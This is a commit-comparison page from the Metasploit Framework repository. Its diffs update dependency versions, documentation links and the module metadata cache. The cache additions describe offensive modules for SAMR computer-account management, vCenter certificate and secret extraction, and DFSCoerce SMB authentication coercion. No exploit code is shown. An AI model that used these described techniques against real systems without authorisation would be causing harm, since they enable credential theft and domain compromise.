Compare commits
125 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
 Metasploit
|
eb6535009f | ||
|
space-r7
|
debf619968 | ||
|
Spencer McIntyre
|
c092291236 | ||
|
Metasploit
|
20fb1e5690 | ||
|
Spencer McIntyre
|
f7209bfc75 | ||
|
adfoster-r7
|
5b8680ee91 | ||
|
Jack Heysel
|
3a4276ad33 | ||
|
bcoles
|
ec2445751f | ||
|
bcoles
|
04aa05faa2 | ||
|
Spencer McIntyre
|
2f1949d021 | ||
|
Metasploit
|
b5d5ba9783 | ||
|
Christophe De La Fuente
|
b40dd95d4f | ||
|
Christophe De La Fuente
|
9de7411723 | ||
|
krastanoel
|
e944196c5c | ||
|
krastanoel
|
2e63a5b48c | ||
|
krastanoel
|
cdc6fe471f | ||
|
Spencer McIntyre
|
60da336ad4 | ||
|
Spencer McIntyre
|
c67432b20d | ||
|
Spencer McIntyre
|
7e35f42eeb | ||
|
Spencer McIntyre
|
7a982a2c83 | ||
|
Spencer McIntyre
|
81ab873d6c | ||
|
Spencer McIntyre
|
43629a3960 | ||
|
space-r7
|
ecb09864d3 | ||
|
Metasploit
|
a172fa0da0 | ||
|
Metasploit
|
b8e6b02d04 | ||
|
Christophe De La Fuente
|
0d19e47b8d | ||
|
krastanoel
|
4f64d098dc | ||
|
krastanoel
|
a2949c7555 | ||
|
krastanoel
|
738aa7ac0a | ||
|
krastanoel
|
f81e4d5dde | ||
|
adfoster-r7
|
1964e61dc8 | ||
|
Grant Willcox
|
685e35788b | ||
|
Spencer McIntyre
|
c4be01c26a | ||
|
Metasploit
|
daaebc0bd8 | ||
|
Spencer McIntyre
|
2d6e910078 | ||
|
Spencer McIntyre
|
1b7d8f1e74 | ||
|
Erik Schweiss
|
695e1243b8 | ||
|
Spencer McIntyre
|
41ba2d263b | ||
|
krastanoel
|
da63fbbad4 | ||
|
Metasploit
|
ed2c64bffd | ||
|
adfoster-r7
|
6b17905790 | ||
|
bcoles
|
9087f86cce | ||
|
Erik Schweiss
|
a89e88c462 | ||
|
Metasploit
|
2cdc8540d4 | ||
|
adfoster-r7
|
22a1e06f02 | ||
|
bcoles
|
66009ca5e5 | ||
|
Erik
|
836970e1ae | ||
|
Erik
|
8259e8e495 | ||
|
Erik
|
ae8f1c3378 | ||
|
Erik
|
e9b2fc6ecf | ||
|
Erik
|
84aa9ceeb9 | ||
|
Erik
|
96feb8d1be | ||
|
Metasploit
|
911092007c | ||
|
Metasploit
|
e2bfef3876 | ||
|
Spencer McIntyre
|
fb3d349969 | ||
|
Christophe De La Fuente
|
df69ffeaae | ||
|
Christophe De La Fuente
|
369c23a90b | ||
|
Grant Willcox
|
5b6d9538cd | ||
|
Grant Willcox
|
477db20c04 | ||
|
Grant Willcox
|
e4ce1c53dd | ||
|
Metasploit
|
fc2efc66ae | ||
|
bwatters
|
c7820048cd | ||
|
Metasploit
|
96fc98eb7d | ||
|
space-r7
|
7983f878a8 | ||
|
adfoster-r7
|
98b2234cab | ||
|
Alexandre ZANNI
|
1b8b37d313 | ||
|
Alexandre ZANNI
|
0e61db7e29 | ||
|
Grant Willcox
|
b10386ba08 | ||
|
Grant Willcox
|
b817a1f8ee | ||
|
Grant Willcox
|
5dd68b23ed | ||
|
Redouane NIBOUCHA
|
d47d1bc259 | ||
|
Metasploit
|
3f433b0c24 | ||
|
Grant Willcox
|
be45688dbc | ||
|
Grant Willcox
|
f0428bfa15 | ||
|
Metasploit
|
1c62a3c859 | ||
|
Grant Willcox
|
18e58bc989 | ||
|
Grant Willcox
|
c94f22cebe | ||
|
Spencer McIntyre
|
a96bc36d9c | ||
|
Spencer McIntyre
|
339114e3c0 | ||
|
Jeffrey Martin
|
bcac5a1274 | ||
|
Jeffrey Martin
|
9b7da41e3d | ||
|
Spencer McIntyre
|
dc3596525e | ||
|
Spencer McIntyre
|
825604dda9 | ||
|
Spencer McIntyre
|
78f2ea39e9 | ||
|
Christophe De La Fuente
|
35e535415a | ||
|
Christophe De La Fuente
|
f804a58970 | ||
|
Spencer McIntyre
|
41567b1eb4 | ||
|
Spencer McIntyre
|
084fc194ea | ||
|
Spencer McIntyre
|
74936f69a3 | ||
|
bwatters
|
be48b1481a | ||
|
adfoster-r7
|
1836cf3a9c | ||
|
Metasploit
|
f39bc72fc4 | ||
|
bwatters
|
f6bd8fd020 | ||
|
Grant Willcox
|
47fcf541e3 | ||
|
Metasploit
|
ebe6f89bdf | ||
|
Grant Willcox
|
f1020289fa | ||
|
Grant Willcox
|
a075c676a6 | ||
|
Metasploit
|
496037c45e | ||
|
dwelch-r7
|
3f06e237b7 | ||
|
Grant Willcox
|
572ee18ad4 | ||
|
adfoster-r7
|
417f34e744 | ||
|
bwatters
|
4aa150bbe5 | ||
|
Metasploit
|
f2e1dca061 | ||
|
bwatters
|
785a176240 | ||
|
kalidor
|
b292586fb3 | ||
|
Redouane NIBOUCHA
|
6d9c789f4d | ||
|
adfoster-r7
|
09f75c65dc | ||
|
Spencer McIntyre
|
45674fbcc2 | ||
|
h00die
|
264085b63c | ||
|
Spencer McIntyre
|
adcf45b0ff | ||
|
bwatters
|
9d67ce0186 | ||
|
npm-cesium137-io
|
1d9089f5a0 | ||
|
kalidor
|
e09169b281 | ||
|
kalidor
|
677b16e09c | ||
|
Spencer McIntyre
|
886f031daa | ||
|
Spencer McIntyre
|
2d0cdc31e3 | ||
|
Spencer McIntyre
|
a8a9b4bbe1 | ||
|
Spencer McIntyre
|
08266beac3 | ||
|
Spencer McIntyre
|
9a345052b6 | ||
|
npm-cesium137-io
|
8b502d074f | ||
|
npm-cesium137-io
|
ecec8a5993 | ||
|
h00die
|
d05e855fab | ||
|
h00die
|
f87f2c0a20 | ||
|
npm-cesium137-io
|
925df9dc87 | ||
|
npm-cesium137-io
|
30aaea9350 |
@@ -8,8 +8,8 @@ labels: "bug"
|
||||
Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
- Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
|
||||
- Wiki: https://docs.metasploit.com/
|
||||
- Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html
|
||||
|
||||
Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
@@ -8,7 +8,7 @@ labels: "suggestion-docs"
|
||||
To make it easier for us to help you, please include as much useful information as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
- Wiki: https://docs.metasploit.com/
|
||||
|
||||
Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
@@ -33,7 +33,7 @@ Why should we document this and who will benefit from it?
|
||||
### Draft the doc
|
||||
|
||||
- [ ] Write the doc, following the format listed in these resources:
|
||||
- [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
|
||||
- [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
|
||||
- [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
|
||||
- [Example of a similar article]()
|
||||
|
||||
|
||||
@@ -8,7 +8,7 @@ labels: "suggestion-feature"
|
||||
To make it easier for us to help you, please include as much useful information as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
- Wiki: https://docs.metasploit.com/
|
||||
|
||||
Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
@@ -8,7 +8,7 @@ labels: "suggestion-module"
|
||||
To make it easier for us to help you, please include as much useful information as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
- Wiki: https://docs.metasploit.com/
|
||||
|
||||
Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
@@ -8,7 +8,7 @@ labels: "question"
|
||||
To make it easier for us to help you, please include as much useful information as possible.
|
||||
|
||||
Useful Links:
|
||||
- Wiki: https://github.com/rapid7/metasploit-framework/wiki
|
||||
- Wiki: https://docs.metasploit.com/
|
||||
|
||||
Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
|
||||
-->
|
||||
|
||||
@@ -31,4 +31,4 @@ Complex Software Examples:
|
||||
We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!
|
||||
|
||||
Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
|
||||
If you wish to sanitize your pcap, please see the [wiki](https://github.com/rapid7/metasploit-framework/wiki/Sanitizing-PCAPs).
|
||||
If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
|
||||
|
||||
+13
-13
@@ -1,7 +1,7 @@
|
||||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (6.2.2)
|
||||
metasploit-framework (6.2.6)
|
||||
actionpack (~> 6.0)
|
||||
activerecord (~> 6.0)
|
||||
activesupport (~> 6.0)
|
||||
@@ -30,7 +30,7 @@ PATH
|
||||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 2.0.93)
|
||||
metasploit-payloads (= 2.0.94)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 1.0.18)
|
||||
mqtt
|
||||
@@ -129,7 +129,7 @@ GEM
|
||||
activerecord (>= 3.1.0, < 8)
|
||||
ast (2.4.2)
|
||||
aws-eventstream (1.2.0)
|
||||
aws-partitions (1.595.0)
|
||||
aws-partitions (1.598.0)
|
||||
aws-sdk-core (3.131.1)
|
||||
aws-eventstream (~> 1, >= 1.0.2)
|
||||
aws-partitions (~> 1, >= 1.525.0)
|
||||
@@ -138,7 +138,7 @@ GEM
|
||||
aws-sdk-ec2 (1.317.0)
|
||||
aws-sdk-core (~> 3, >= 3.127.0)
|
||||
aws-sigv4 (~> 1.1)
|
||||
aws-sdk-iam (1.68.0)
|
||||
aws-sdk-iam (1.69.0)
|
||||
aws-sdk-core (~> 3, >= 3.127.0)
|
||||
aws-sigv4 (~> 1.1)
|
||||
aws-sdk-kms (1.57.0)
|
||||
@@ -247,7 +247,7 @@ GEM
|
||||
activemodel (~> 6.0)
|
||||
activesupport (~> 6.0)
|
||||
railties (~> 6.0)
|
||||
metasploit-payloads (2.0.93)
|
||||
metasploit-payloads (2.0.94)
|
||||
metasploit_data_models (5.0.5)
|
||||
activerecord (~> 6.0)
|
||||
activesupport (~> 6.0)
|
||||
@@ -268,7 +268,7 @@ GEM
|
||||
mustermann (1.1.1)
|
||||
ruby2_keywords (~> 0.0.1)
|
||||
nessus_rest (0.1.6)
|
||||
net-ldap (0.17.0)
|
||||
net-ldap (0.17.1)
|
||||
net-protocol (0.1.3)
|
||||
timeout
|
||||
net-smtp (0.3.1)
|
||||
@@ -283,7 +283,7 @@ GEM
|
||||
mini_portile2 (~> 2.8.0)
|
||||
racc (~> 1.4)
|
||||
nori (2.6.0)
|
||||
octokit (4.23.0)
|
||||
octokit (4.24.0)
|
||||
faraday (>= 1, < 3)
|
||||
sawyer (~> 0.9)
|
||||
openssl-ccm (1.2.2)
|
||||
@@ -321,7 +321,7 @@ GEM
|
||||
rails-dom-testing (2.0.3)
|
||||
activesupport (>= 4.2.0)
|
||||
nokogiri (>= 1.6)
|
||||
rails-html-sanitizer (1.4.2)
|
||||
rails-html-sanitizer (1.4.3)
|
||||
loofah (~> 2.3)
|
||||
railties (6.1.6)
|
||||
actionpack (= 6.1.6)
|
||||
@@ -351,7 +351,7 @@ GEM
|
||||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.30)
|
||||
rex-exploitation (0.1.31)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
@@ -383,7 +383,7 @@ GEM
|
||||
rex-socket
|
||||
rex-text
|
||||
rex-struct2 (0.1.3)
|
||||
rex-text (0.2.37)
|
||||
rex-text (0.2.38)
|
||||
rex-zip (0.1.4)
|
||||
rex-text
|
||||
rexml (3.2.5)
|
||||
@@ -411,7 +411,7 @@ GEM
|
||||
rspec-rerun (1.1.0)
|
||||
rspec (~> 3.0)
|
||||
rspec-support (3.11.0)
|
||||
rubocop (1.30.0)
|
||||
rubocop (1.30.1)
|
||||
parallel (~> 1.10)
|
||||
parser (>= 3.1.0.0)
|
||||
rainbow (>= 2.2.2, < 4.0)
|
||||
@@ -427,7 +427,7 @@ GEM
|
||||
ruby-progressbar (1.11.0)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby2_keywords (0.0.5)
|
||||
ruby_smb (3.1.3)
|
||||
ruby_smb (3.1.6)
|
||||
bindata
|
||||
openssl-ccm
|
||||
openssl-cmac
|
||||
@@ -435,7 +435,7 @@ GEM
|
||||
windows_error (>= 0.1.4)
|
||||
rubyntlm (0.6.3)
|
||||
rubyzip (2.3.2)
|
||||
sawyer (0.9.1)
|
||||
sawyer (0.9.2)
|
||||
addressable (>= 2.3.5)
|
||||
faraday (>= 0.17.3, < 3)
|
||||
simplecov (0.18.2)
|
||||
|
||||
+23
-32
@@ -10,10 +10,10 @@ afm, 0.2.2, MIT
|
||||
arel-helpers, 2.14.0, MIT
|
||||
ast, 2.4.2, MIT
|
||||
aws-eventstream, 1.2.0, "Apache 2.0"
|
||||
aws-partitions, 1.588.0, "Apache 2.0"
|
||||
aws-sdk-core, 3.131.0, "Apache 2.0"
|
||||
aws-sdk-ec2, 1.315.0, "Apache 2.0"
|
||||
aws-sdk-iam, 1.68.0, "Apache 2.0"
|
||||
aws-partitions, 1.598.0, "Apache 2.0"
|
||||
aws-sdk-core, 3.131.1, "Apache 2.0"
|
||||
aws-sdk-ec2, 1.317.0, "Apache 2.0"
|
||||
aws-sdk-iam, 1.69.0, "Apache 2.0"
|
||||
aws-sdk-kms, 1.57.0, "Apache 2.0"
|
||||
aws-sdk-s3, 1.114.0, "Apache 2.0"
|
||||
aws-sigv4, 1.5.0, "Apache 2.0"
|
||||
@@ -42,16 +42,8 @@ eventmachine, 1.2.7, "ruby, GPL-2.0"
|
||||
factory_bot, 6.2.1, MIT
|
||||
factory_bot_rails, 6.2.0, MIT
|
||||
faker, 2.21.0, MIT
|
||||
faraday, 1.10.0, MIT
|
||||
faraday-em_http, 1.0.0, MIT
|
||||
faraday-em_synchrony, 1.0.0, MIT
|
||||
faraday-excon, 1.1.0, MIT
|
||||
faraday-httpclient, 1.0.1, MIT
|
||||
faraday-multipart, 1.0.3, MIT
|
||||
faraday-net_http, 1.0.1, MIT
|
||||
faraday-net_http_persistent, 1.2.0, MIT
|
||||
faraday-patron, 1.0.0, MIT
|
||||
faraday-rack, 1.0.0, MIT
|
||||
faraday, 2.3.0, MIT
|
||||
faraday-net_http, 2.0.3, MIT
|
||||
faraday-retry, 1.0.3, MIT
|
||||
faye-websocket, 0.11.1, "Apache 2.0"
|
||||
ffi, 1.15.5, "New BSD"
|
||||
@@ -62,7 +54,7 @@ gyoku, 1.4.0, MIT
|
||||
hashery, 2.1.2, "Simplified BSD"
|
||||
hrr_rb_ssh, 0.4.2, "Apache 2.0"
|
||||
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
|
||||
http-cookie, 1.0.4, MIT
|
||||
http-cookie, 1.0.5, MIT
|
||||
http_parser.rb, 0.8.0, MIT
|
||||
httpclient, 2.8.3, ruby
|
||||
i18n, 1.10.0, MIT
|
||||
@@ -72,27 +64,26 @@ jmespath, 1.6.1, "Apache 2.0"
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.6.2, ruby
|
||||
little-plugger, 1.1.4, MIT
|
||||
logging, 2.3.0, MIT
|
||||
logging, 2.3.1, MIT
|
||||
loofah, 2.18.0, MIT
|
||||
memory_profiler, 1.0.0, MIT
|
||||
metasm, 1.0.5, LGPL-2.1
|
||||
metasploit-concern, 4.0.4, "New BSD"
|
||||
metasploit-credential, 5.0.7, "New BSD"
|
||||
metasploit-framework, 6.2.2, "New BSD"
|
||||
metasploit-framework, 6.2.6, "New BSD"
|
||||
metasploit-model, 4.0.4, "New BSD"
|
||||
metasploit-payloads, 2.0.87, "3-clause (or ""modified"") BSD"
|
||||
metasploit-payloads, 2.0.94, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 5.0.5, "New BSD"
|
||||
metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
|
||||
method_source, 1.0.0, MIT
|
||||
mini_portile2, 2.8.0, MIT
|
||||
minitest, 5.15.0, MIT
|
||||
mqtt, 0.5.0, MIT
|
||||
msgpack, 1.5.1, "Apache 2.0"
|
||||
msgpack, 1.5.2, "Apache 2.0"
|
||||
multi_json, 1.15.0, MIT
|
||||
multipart-post, 2.1.1, MIT
|
||||
mustermann, 1.1.1, MIT
|
||||
nessus_rest, 0.1.6, MIT
|
||||
net-ldap, 0.17.0, MIT
|
||||
net-ldap, 0.17.1, MIT
|
||||
net-protocol, 0.1.3, "ruby, Simplified BSD"
|
||||
net-smtp, 0.3.1, "ruby, Simplified BSD"
|
||||
net-ssh, 6.1.0, MIT
|
||||
@@ -101,7 +92,7 @@ nexpose, 7.3.0, "New BSD"
|
||||
nio4r, 2.5.8, MIT
|
||||
nokogiri, 1.13.6, MIT
|
||||
nori, 2.6.0, MIT
|
||||
octokit, 4.22.0, MIT
|
||||
octokit, 4.24.0, MIT
|
||||
openssl-ccm, 1.2.2, MIT
|
||||
openssl-cmac, 2.0.1, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
@@ -117,18 +108,18 @@ pry-byebug, 3.9.0, MIT
|
||||
public_suffix, 4.0.7, MIT
|
||||
puma, 5.6.4, "New BSD"
|
||||
racc, 1.6.0, "ruby, Simplified BSD"
|
||||
rack, 2.2.3, MIT
|
||||
rack, 2.2.3.1, MIT
|
||||
rack-protection, 2.2.0, MIT
|
||||
rack-test, 1.1.0, MIT
|
||||
rails-dom-testing, 2.0.3, MIT
|
||||
rails-html-sanitizer, 1.4.2, MIT
|
||||
rails-html-sanitizer, 1.4.3, MIT
|
||||
railties, 6.1.6, MIT
|
||||
rainbow, 3.1.1, MIT
|
||||
rake, 13.0.6, MIT
|
||||
rb-readline, 0.5.5, BSD
|
||||
recog, 2.3.23, unknown
|
||||
redcarpet, 3.5.1, MIT
|
||||
regexp_parser, 2.4.0, MIT
|
||||
regexp_parser, 2.5.0, MIT
|
||||
reline, 0.2.5, ruby
|
||||
rex-arch, 0.1.14, "New BSD"
|
||||
rex-bin_tools, 0.1.8, "New BSD"
|
||||
@@ -146,7 +137,7 @@ rex-rop_builder, 0.1.4, "New BSD"
|
||||
rex-socket, 0.1.39, "New BSD"
|
||||
rex-sslscan, 0.1.7, "New BSD"
|
||||
rex-struct2, 0.1.3, "New BSD"
|
||||
rex-text, 0.2.37, "New BSD"
|
||||
rex-text, 0.2.38, "New BSD"
|
||||
rex-zip, 0.1.4, "New BSD"
|
||||
rexml, 3.2.5, "Simplified BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
@@ -157,17 +148,17 @@ rspec-mocks, 3.11.1, MIT
|
||||
rspec-rails, 5.1.2, MIT
|
||||
rspec-rerun, 1.1.0, MIT
|
||||
rspec-support, 3.11.0, MIT
|
||||
rubocop, 1.29.1, MIT
|
||||
rubocop, 1.30.1, MIT
|
||||
rubocop-ast, 1.18.0, MIT
|
||||
ruby-macho, 3.0.0, MIT
|
||||
ruby-prof, 1.4.2, "Simplified BSD"
|
||||
ruby-progressbar, 1.11.0, MIT
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
|
||||
ruby_smb, 3.1.3, "New BSD"
|
||||
ruby_smb, 3.1.5, "New BSD"
|
||||
rubyntlm, 0.6.3, MIT
|
||||
rubyzip, 2.3.2, "Simplified BSD"
|
||||
sawyer, 0.8.2, MIT
|
||||
sawyer, 0.9.2, MIT
|
||||
simplecov, 0.18.2, MIT
|
||||
simplecov-html, 0.12.3, MIT
|
||||
simpleidn, 0.2.1, MIT
|
||||
@@ -179,12 +170,12 @@ thin, 1.8.1, "GPL-2.0+, ruby"
|
||||
thor, 1.2.1, MIT
|
||||
tilt, 2.0.10, MIT
|
||||
timecop, 0.9.5, MIT
|
||||
timeout, 0.2.0, "ruby, Simplified BSD"
|
||||
timeout, 0.3.0, "ruby, Simplified BSD"
|
||||
ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
|
||||
tzinfo, 2.0.4, MIT
|
||||
tzinfo-data, 1.2022.1, MIT
|
||||
unf, 0.1.4, "2-clause BSDL"
|
||||
unf_ext, 0.0.8.1, MIT
|
||||
unf_ext, 0.0.8.2, MIT
|
||||
unicode-display_width, 2.1.0, MIT
|
||||
unix-crypt, 1.3.0, BSD
|
||||
warden, 1.2.9, MIT
|
||||
@@ -196,5 +187,5 @@ windows_error, 0.1.4, BSD
|
||||
winrm, 2.3.6, "Apache 2.0"
|
||||
xdr, 3.0.3, "Apache 2.0"
|
||||
xmlrpc, 0.3.2, "ruby, Simplified BSD"
|
||||
yard, 0.9.27, MIT
|
||||
yard, 0.9.28, MIT
|
||||
zeitwerk, 2.5.4, MIT
|
||||
|
||||
+511
-279
@@ -537,6 +537,56 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"auxiliary_admin/dcerpc/samr_computer": {
|
||||
"name": "SAMR Computer Management",
|
||||
"fullname": "auxiliary/admin/dcerpc/samr_computer",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "auxiliary",
|
||||
"author": [
|
||||
"JaGoTu",
|
||||
"Spencer McIntyre"
|
||||
],
|
||||
"description": "Add, lookup and delete computer accounts via MS-SAMR. By default\n standard active directory users can add up to 10 new computers to the\n domain. Administrative privileges however are required to delete the\n created accounts.",
|
||||
"references": [
|
||||
"URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
|
||||
],
|
||||
"platform": "",
|
||||
"arch": "",
|
||||
"rport": 445,
|
||||
"autofilter_ports": [
|
||||
139,
|
||||
445
|
||||
],
|
||||
"autofilter_services": [
|
||||
"netbios-ssn",
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-06-28 11:53:05 +0000",
|
||||
"path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/dcerpc/samr_computer",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Reliability": [
|
||||
|
||||
],
|
||||
"Stability": [
|
||||
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"auxiliary_admin/dns/dyn_dns_update": {
|
||||
"name": "DNS Server Dynamic Update Record Injection",
|
||||
"fullname": "auxiliary/admin/dns/dyn_dns_update",
|
||||
@@ -4468,8 +4518,7 @@
|
||||
],
|
||||
"description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n address will be changed. User registration is\n enabled, and default user role is set to administrator. A user is then created with\n the USER name set. A valid EMAIL is required to get the registration email (not handled in MSF).",
|
||||
"references": [
|
||||
"URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/",
|
||||
"NOCVE-Patched in 3.53.3 without vendor disclosure"
|
||||
"URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
|
||||
],
|
||||
"platform": "PHP",
|
||||
"arch": "php",
|
||||
@@ -4490,7 +4539,7 @@
|
||||
"https"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2021-11-04 15:28:05 +0000",
|
||||
"mod_time": "2022-06-10 14:01:57 +0000",
|
||||
"path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/http/wp_automatic_plugin_privesc",
|
||||
@@ -4507,6 +4556,9 @@
|
||||
"SideEffects": [
|
||||
"config-changes",
|
||||
"ioc-in-logs"
|
||||
],
|
||||
"NOCVE": [
|
||||
"Patched in 3.53.3 without vendor disclosure"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
@@ -4649,7 +4701,7 @@
|
||||
"https"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2020-10-02 17:38:06 +0000",
|
||||
"mod_time": "2022-06-10 14:01:57 +0000",
|
||||
"path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/http/wp_gdpr_compliance_privesc",
|
||||
@@ -4657,6 +4709,12 @@
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
|
||||
],
|
||||
"Reliability": [
|
||||
|
||||
],
|
||||
"SideEffects": [
|
||||
"config-changes"
|
||||
]
|
||||
@@ -8854,6 +8912,53 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"auxiliary_admin/vmware/vcenter_offline_mdb_extract": {
|
||||
"name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File",
|
||||
"fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": "2022-05-10",
|
||||
"type": "auxiliary",
|
||||
"author": [
|
||||
"npm <npm@cesium137.io>"
|
||||
],
|
||||
"description": "Grab certificates from the vCenter server vmdird and vmafd\n database files and adds them to loot. The vmdird MDB database file\n can be found on the live appliance under the path\n /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path\n /storage/db/vmware-vmafd/afd.db. The vmdir database contains the\n IdP signing credential, and vmafd contains the vCenter certificate\n store. This module will accept either file from a live vCenter\n appliance, or from a vCenter appliance backup archive; either or\n both files can be supplied.",
|
||||
"references": [
|
||||
"URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/"
|
||||
],
|
||||
"platform": "Linux",
|
||||
"arch": "",
|
||||
"rport": null,
|
||||
"autofilter_ports": [
|
||||
|
||||
],
|
||||
"autofilter_services": [
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-26 11:52:56 +0000",
|
||||
"path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/vmware/vcenter_offline_mdb_extract",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"artifacts-on-disk"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"auxiliary_admin/vnc/realvnc_41_bypass": {
|
||||
"name": "RealVNC NULL Authentication Mode Bypass",
|
||||
"fullname": "auxiliary/admin/vnc/realvnc_41_bypass",
|
||||
@@ -19384,7 +19489,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2021-02-17 12:33:59 +0000",
|
||||
"mod_time": "2022-06-22 19:44:53 +0000",
|
||||
"path": "/modules/auxiliary/gather/memcached_extractor.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "gather/memcached_extractor",
|
||||
@@ -22144,6 +22249,48 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"auxiliary_scanner/dcerpc/dfscoerce": {
|
||||
"name": "DFSCoerce",
|
||||
"fullname": "auxiliary/scanner/dcerpc/dfscoerce",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "auxiliary",
|
||||
"author": [
|
||||
"Wh04m1001",
|
||||
"xct_de",
|
||||
"Spencer McIntyre"
|
||||
],
|
||||
"description": "Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.",
|
||||
"references": [
|
||||
"URL-https://github.com/Wh04m1001/DFSCoerce"
|
||||
],
|
||||
"platform": "",
|
||||
"arch": "",
|
||||
"rport": 445,
|
||||
"autofilter_ports": [
|
||||
139,
|
||||
445
|
||||
],
|
||||
"autofilter_services": [
|
||||
"netbios-ssn",
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-06-30 17:38:30 +0000",
|
||||
"path": "/modules/auxiliary/scanner/dcerpc/dfscoerce.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/dcerpc/dfscoerce",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"auxiliary_scanner/dcerpc/endpoint_mapper": {
|
||||
"name": "Endpoint Mapper Service Discovery",
|
||||
"fullname": "auxiliary/scanner/dcerpc/endpoint_mapper",
|
||||
